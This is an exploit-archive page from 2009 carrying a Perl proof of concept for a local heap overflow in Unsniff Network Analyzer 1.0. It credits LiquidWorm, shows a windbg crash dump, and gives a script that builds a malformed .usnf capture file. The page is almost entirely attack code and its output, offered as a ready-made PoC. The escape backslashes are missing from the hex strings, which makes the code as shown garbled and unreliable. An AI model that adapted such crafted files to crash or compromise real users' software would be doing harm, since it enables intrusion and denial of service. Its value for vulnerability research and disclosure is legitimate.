Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
# Published : 2009-04-06
# Author : LiquidWorm
# Previous Title : UltraISO <= 9.3.3.2685 .ui Off By One / Buffer Overflow PoC
# Next Title : IBM DB2 < 9.5 pack 3a Malicious Connect Denial of Service Exploit

#!/usr/bin/perl
#
# Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
#
# Summary: Dont just look at hex dumps and protocol trees. With Unsniff
# Network Analyzer, you can view network traffic at various levels of detail.
# View high level objects like images, video, HTML pages, VOIP calls, drill
# down to individual TCP sessions, then onto reassembled PDUs, then finally
# to individual packets. All this functionality is packed in a cool graphical
# interface.
#
# Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
# ----------------------------windbg outpootz-------------------------------
#
# HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff)
# (998.d08): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000
# eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# vocore2u!CatFactory_SysLASwizzle+0x24602:
# 018468d1 f3ab            rep stos dword ptr es:[edi]
# Missing image name, possible paged-out or corrupt data.
#
# --------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 06.04.2009
#





    	     $a="x01x00x00x00x11".
	"x27x00x00x56x00x4Fx00x44".
    "x00x41".	      "x00".	    "x54x00".
   "x42x00".	      "x53".	     "x00x31".
  "x00". "x00".     "x00".	  "x00". "x00".
  "x00x00".	      "x00".	      "x00x00".
  "x00x00".	      "x00".	      "x00x00".
  "x00x00".	    "x00x00".	      "x00x00".
   "x00x20".    "x00".  "x00".    "x00x10".
    "x00x00".  "x00".    "x40".  "x00x00".
     "x00x40x04".           "x00x02x00".
      "x40x00";$b="x4A"x300000;$c="x0D".
         "x0A"x10;$d="x90"x20;$e="x00".
		      "x00".
		   #############
 "x00x00x00x00x00x00x00x00x00x00x00x00".
 "x00x00x00x00x00x00x2Cx24x00x00x2Ax24".
 "x00x00". "x29x24x00x00x27x24". "x00x00".
 "x26x24". "x00x00x24x24x00x00". "x23x24".
 "x00x00". "x21x24x00x00x20x24". "x00x00".
 "x1Ex24". "x00x00x1Dx24x00x00". "x1Bx24".
 "x00x00". "x1Ax24x00x00x18x24". "x00x00".
 "x17x24". "x00x00x15x24x00x00". "x14x24".
 "x00x00". "x12x24x00x00x11x24". "x00x00".
 "x0Fx24". "x00x00x0Ex24x00x00". "x0Cx24".
 "x00x00". "x0Bx24x00x00x09x24". "x00x00".
 "x08x24". "x00x00x06x24x00x00". "x05x24".
 "x00x00". "x03x24x00x00x02x24". "x00x00".
	     "x00x24x00x00xFFx23".
	     "x00x00xFDx23x00x00".
	     "xFCx23x00x00xFAx23".
	     "x00x00xF9x23x00x00".
	 "xF7x23x00x00xF6x23x00x00".
     "xF4x23x00x00xF3x23x00x00xF1x23".
       "x00x00xF0x23x00x00xEEx23x00".
	      "x00xEDx23x00x00";
	     $file="Denny_Crane.usnf";
		open j, ">./$file";
	    ###########################
		###################
		   #-#-#-##-#-#-#
		       #t00t#

						print j $a.$b.$c.$d.$b.$c.$d.$e;
						close j;sleep 1;print "nYeah.n";
						print "File $file successfully landed!n";

# www.Syue.com [2009-04-06]